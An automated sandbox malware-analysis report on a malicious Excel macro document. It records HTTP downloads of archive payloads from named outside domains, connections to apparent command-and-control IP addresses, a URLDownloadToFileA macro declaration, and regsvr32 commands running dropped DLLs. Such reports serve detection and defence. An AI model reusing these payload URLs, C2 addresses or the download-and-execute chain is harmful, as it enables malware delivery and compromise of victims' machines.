Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7A618C6.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /h79fwesfe.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: monitrade.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ys95lm6k.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bafnabrotherskesarwala.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xkpffwn.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: artec.com.trConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ylztwx.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.gastronauts.asiaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /uzssv27.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laureys.beConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laureys.beConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /by9zwa7p1.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cms.ivpr.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /d8ms3mljy.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: salaodigitalautomovel.pt.deve.ptConnection: Keep-Alive
Source: regsvr32.exe, 00000006.00000002.2400051881.0000000000405000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2400051881.0000000000405000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: monitrade.net
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Jan 2021 15:13:21 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en#0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab5t
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/env
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000002.00000002.2107200716.0000000001D70000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2406809963.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2112116772.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2419749632.0000000000880000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2113665422.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2120190682.0000000001D30000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2114236047.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2124921151.0000000001DF0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000006.00000002.2400015842.00000000003F9000.00000004.00000020.sdmpString found in binary or memory: https://194.225.58.214/
Source: regsvr32.exe, 00000006.00000002.2400015842.00000000003F9000.00000004.00000020.sdmpString found in binary or memory: https://194.225.58.214/5
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: https://194.225.58.214/9
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmpString found in binary or memory: https://198.57.200.100/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmpString found in binary or memory: https://198.57.200.100:3786/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmpString found in binary or memory: https://198.57.200.100:3786/hy;R
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmpString found in binary or memory: https://211.110.44.63/
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: https://211.110.44.63/h
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: https://211.110.44.63/~
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: https://211.110.44.63:5353/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140/
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: https://69.164.207.140/q
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140:3388/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140:3388/hy
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49225
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49302
Source: unknownNetwork traffic detected: HTTP traffic on port 49288 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49222
Source: unknownNetwork traffic detected: HTTP traffic on port 49294 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49264
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49186
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49260
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49256 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49271 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49216
Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49293 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49257
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49256
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49294
Source: unknownNetwork traffic detected: HTTP traffic on port 49249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49293
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49228 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49309 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49209
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49249
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49204
Source: unknownNetwork traffic detected: HTTP traffic on port 49244 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49305 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49244
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49288
Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49241
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49279
Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49199
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49232
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49271
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49257 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49309
Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49228
Source: unknownNetwork traffic detected: HTTP traffic on port 49232 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49305

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function mi_1, API Run("forsS_mo")
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function mi_1, API Run("forsS_mo")
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: printouts of outstanding as of 01_20_2021.xlsmOLE, VBA macro line: Private Declare PtrSafe Function P_Click_Box Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: printouts of outstanding as of 01_20_2021.xlsmOLE, VBA macro line: Private Declare PtrSafe Function P_Click_Box Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: printouts of outstanding as of 01_20_2021.xlsmOLE, VBA macro line: Private Declare Function P_Click_Box Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
Source: printouts of outstanding as of 01_20_2021.xlsmOLE, VBA macro line: Private Declare Function P_Click_Box Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: printouts of outstanding as of 01_20_2021.xlsmInitial sample: CALL
Source: printouts of outstanding as of 01_20_2021.xlsmInitial sample: CALL
Source: printouts of outstanding as of 01_20_2021.xlsmInitial sample: CALL
Source: printouts of outstanding as of 01_20_2021.xlsmInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\zsijkwsd.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\ogsit.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\zlgzuxvz.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rarJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: printouts of outstanding as of 01_20_2021.xlsmOLE, VBA macro line: Private Sub vbox1_cli_Layout()
Source: VBA code instrumentationOLE, VBA macro: Module Sheet1, Function vbox1_cli_Layout
Source: printouts of outstanding as of 01_20_2021.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal100.expl.evad.winXLSM@41/22@7/11
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$printouts of outstanding as of 01_20_2021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE30E.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: printouts of outstanding as of 01_20_2021.xlsmVirustotal: Detection: 24%
Source: printouts of outstanding as of 01_20_2021.xlsmReversingLabs: Detection: 11%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zdkvrlsh.dll
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zaviwlej.dll
